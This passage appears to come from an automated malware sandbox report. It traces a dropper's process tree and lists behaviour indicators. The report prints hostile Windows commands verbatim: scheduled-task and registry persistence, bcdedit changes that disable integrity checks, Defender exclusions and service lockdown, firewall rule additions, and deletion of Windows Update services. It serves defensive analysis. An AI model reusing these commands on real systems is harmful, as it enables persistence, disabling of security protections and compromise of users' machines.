SeShutdownPrivilege 2604 powercfg.exe Token: SeShutdownPrivilege 2672 powercfg.exe Token: SeDebugPrivilege 1732 powershell.exe Token: SeShutdownPrivilege 2772 powercfg.exe Token: SeShutdownPrivilege 2952 powercfg.exe Token: SeShutdownPrivilege 1612 powercfg.exe Token: SeDebugPrivilege 2628 powershell.exe Token: SeShutdownPrivilege 2232 powercfg.exe Token: SeSecurityPrivilege 2148 sc.exe Token: SeSecurityPrivilege 2148 sc.exe Token: SeDebugPrivilege 2712 powershell.exe Token: SeShutdownPrivilege 2112 powercfg.exe Token: SeShutdownPrivilege 916 powercfg.exe Token: SeDebugPrivilege 2400 powershell.exe Token: SeShutdownPrivilege 1636 powercfg.exe Token: SeShutdownPrivilege 2808 powercfg.exe Token: SeShutdownPrivilege 1280 Explorer.EXE Token: SeAssignPrimaryTokenPrivilege 2796 WMIC.exe Token: SeIncreaseQuotaPrivilege 2796 WMIC.exe Token: SeSecurityPrivilege 2796 WMIC.exe Token: SeTakeOwnershipPrivilege 2796 WMIC.exe Token: SeLoadDriverPrivilege 2796 WMIC.exe Token: SeSystemtimePrivilege 2796 WMIC.exe Token: SeBackupPrivilege 2796 WMIC.exe Token: SeRestorePrivilege 2796 WMIC.exe Token: SeShutdownPrivilege 2796 WMIC.exe Token: SeSystemEnvironmentPrivilege 2796 WMIC.exe Token: SeUndockPrivilege 2796 WMIC.exe Token: SeManageVolumePrivilege 2796 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2796 WMIC.exe Token: SeIncreaseQuotaPrivilege 2796 WMIC.exe Token: SeSecurityPrivilege 2796 WMIC.exe Token: SeTakeOwnershipPrivilege 2796 WMIC.exe Token: SeLoadDriverPrivilege 2796 WMIC.exe Token: SeSystemtimePrivilege 2796 WMIC.exe Token: SeBackupPrivilege 2796 WMIC.exe Token: SeRestorePrivilege 2796 WMIC.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1464 oldplayer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1708 wrote to memory of 1068 1708 2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe 28 PID 1708 wrote to memory of 1068 1708 2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe 28 PID 1708 wrote to memory of 1068 1708 2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe 28 PID 1708 wrote to memory of 1068 1708 2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe 28 PID 1708 wrote to memory of 1464 1708 2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe 29 PID 1708 wrote to memory of 1464 1708 2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe 29 PID 1708 wrote to memory of 1464 1708 2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe 29 PID 1708 wrote to memory of 1464 1708 2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe 29 PID 1708 wrote to memory of 680 1708 2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe 30 PID 1708 wrote to memory of 680 1708 2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe 30 PID 1708 wrote to memory of 680 1708 2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe 30 PID 1708 wrote to memory of 680 1708 2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe 30 PID 1464 wrote to memory of 1136 1464 oldplayer.exe 31 PID 1464 wrote to memory of 1136 1464 oldplayer.exe 31 PID 1464 wrote to memory of 1136 1464 oldplayer.exe 31 PID 1464 wrote to memory of 1136 1464 oldplayer.exe 31 PID 1136 wrote to memory of 696 1136 oneetx.exe 32 PID 1136 wrote to memory of 696 1136 oneetx.exe 32 PID 1136 wrote to memory of 696 1136 oneetx.exe 32 PID 1136 wrote to memory of 696 1136 oneetx.exe 32 PID 1136 wrote to memory of 1540 1136 oneetx.exe 34 PID 1136 wrote to memory of 1540 1136 oneetx.exe 34 PID 1136 wrote to memory of 1540 1136 oneetx.exe 34 PID 1136 wrote to memory of 1540 1136 oneetx.exe 34 PID 1540 wrote to memory of 1596 1540 cmd.exe 36 PID 1540 wrote to memory of 1596 1540 cmd.exe 36 PID 1540 wrote to memory of 1596 1540 cmd.exe 36 PID 1540 wrote to memory of 1596 1540 cmd.exe 36 PID 1540 wrote to memory of 624 1540 cmd.exe 37 PID 1540 wrote to memory of 624 1540 cmd.exe 37 PID 1540 wrote to memory of 624 1540 cmd.exe 37 PID 1540 wrote to memory of 624 1540 cmd.exe 37 PID 1540 wrote to memory of 1520 1540 cmd.exe 38 PID 1540 wrote to memory of 1520 1540 cmd.exe 38 PID 1540 wrote to memory of 1520 1540 cmd.exe 38 PID 1540 wrote to memory of 1520 1540 cmd.exe 38 PID 1540 wrote to memory of 844 1540 cmd.exe 39 PID 1540 wrote to memory of 844 1540 cmd.exe 39 PID 1540 wrote to memory of 844 1540 cmd.exe 39 PID 1540 wrote to memory of 844 1540 cmd.exe 39 PID 1540 wrote to memory of 1100 1540 cmd.exe 40 PID 1540 wrote to memory of 1100 1540 cmd.exe 40 PID 1540 wrote to memory of 1100 1540 cmd.exe 40 PID 1540 wrote to memory of 1100 1540 cmd.exe 40 PID 1540 wrote to memory of 1748 1540 cmd.exe 41 PID 1540 wrote to memory of 1748 1540 cmd.exe 41 PID 1540 wrote to memory of 1748 1540 cmd.exe 41 PID 1540 wrote to memory of 1748 1540 cmd.exe 41 PID 1432 wrote to memory of 1704 1432 taskeng.exe 45 PID 1432 wrote to memory of 1704 1432 taskeng.exe 45 PID 1432 wrote to memory of 1704 1432 taskeng.exe 45 PID 1432 wrote to memory of 1704 1432 taskeng.exe 45 PID 1136 wrote to memory of 1884 1136 oneetx.exe 46 PID 1136 wrote to memory of 1884 1136 oneetx.exe 46 PID 1136 wrote to memory of 1884 1136 oneetx.exe 46 PID 1136 wrote to memory of 1884 1136 oneetx.exe 46 PID 1136 wrote to memory of 1884 1136 oneetx.exe 46 PID 1136 wrote to memory of 1884 1136 oneetx.exe 46 PID 1136 wrote to memory of 1884 1136 oneetx.exe 46 PID 1136 wrote to memory of 856 1136 oneetx.exe 48 PID 1136 wrote to memory of 856 1136 oneetx.exe 48 PID 1136 wrote to memory of 856 1136 oneetx.exe 48 PID 1136 wrote to memory of 856 1136 oneetx.exe 48 PID 1884 wrote to memory of 624 1884 setup.exe 49 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1280 -
C:\Users\Admin\AppData\Local\Temp\2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe"C:\Users\Admin\AppData\Local\Temp\2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Users\Admin\AppData\Local\Temp\aafg31.exe"C:\Users\Admin\AppData\Local\Temp\aafg31.exe"3⤵
- Executes dropped EXE
- Modifies system certificate store
PID:1068
-
-
C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1464 -
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1136 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F5⤵
- Creates scheduled task(s)
PID:696
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit5⤵
- Suspicious use of WriteProcessMemory
PID:1540 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"6⤵PID:1596
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "oneetx.exe" /P "Admin:N"6⤵PID:624
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "oneetx.exe" /P "Admin:R" /E6⤵PID:1520
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"6⤵PID:844
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\207aa4515d" /P "Admin:N"6⤵PID:1100
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\207aa4515d" /P "Admin:R" /E6⤵PID:1748
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe"C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1884 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1000201001\setup.exe" & exit6⤵PID:624
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2016
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:856 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:916
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:924
-
-
C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1596 -
C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\1000202001\toolspub2.exe"6⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1704
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1416 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1564
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2040
-
-
C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe"C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1248 -
C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe"C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe"6⤵
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1580 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"7⤵PID:2176
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes8⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:2200
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe7⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Manipulates WinMon driver.
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2332 -
C:\Windows\system32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f8⤵PID:2236
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F8⤵
- Creates scheduled task(s)
PID:2172
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:2168 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER9⤵
- Modifies boot configuration data using bcdedit
PID:2104
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:9⤵
- Modifies boot configuration data using bcdedit
PID:2092
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:9⤵
- Modifies boot configuration data using bcdedit
PID:2836
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows9⤵
- Modifies boot configuration data using bcdedit
PID:2844
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe9⤵
- Modifies boot configuration data using bcdedit
PID:2864
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe9⤵
- Modifies boot configuration data using bcdedit
PID:2928
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 09⤵
- Modifies boot configuration data using bcdedit
PID:2640
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn9⤵
- Modifies boot configuration data using bcdedit
PID:2652
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 19⤵
- Modifies boot configuration data using bcdedit
PID:2584
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}9⤵
- Modifies boot configuration data using bcdedit
PID:3052
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast9⤵
- Modifies boot configuration data using bcdedit
PID:2256
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 09⤵
- Modifies boot configuration data using bcdedit
PID:2760
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}9⤵
- Modifies boot configuration data using bcdedit
PID:1720
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2560
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v8⤵
- Modifies boot configuration data using bcdedit
PID:1248
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeC:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe8⤵
- Executes dropped EXE
PID:844
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F8⤵
- Creates scheduled task(s)
PID:2328
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"8⤵
- Executes dropped EXE
PID:2440 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)9⤵PID:2564
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)10⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:2148
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exeC:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe8⤵
- Executes dropped EXE
PID:1700 -
C:\Windows\system32\schtasks.exeschtasks /delete /tn "csrss" /f9⤵PID:480
-
-
C:\Windows\system32\schtasks.exeschtasks /delete /tn "ScheduledUpdate" /f9⤵PID:2648
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"C:\Users\Admin\AppData\Local\Temp\1000186001\updEdge.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:480 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2808
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1312
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\XandETC.exe"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:680
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2252
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2592 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn NoteUpdateTaskMachineQC /tr "'C:\Program Files\Notepad\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:2932
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:2584
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2800
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2940
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2924
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2980
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵PID:2576
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2644
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2952
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:3000
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3012
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2072
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:1248
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:1708
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:1416
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:2224
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:2132
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3036 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC3⤵PID:1048
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2788
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:2884
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2908
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2920
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2648
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2944
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2984
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:2616
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2668
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2252
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2596
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:680
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2956 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:2068
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:1960
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2120
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:2212
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2392
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2328
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2372
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2428
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2440
-
-
-
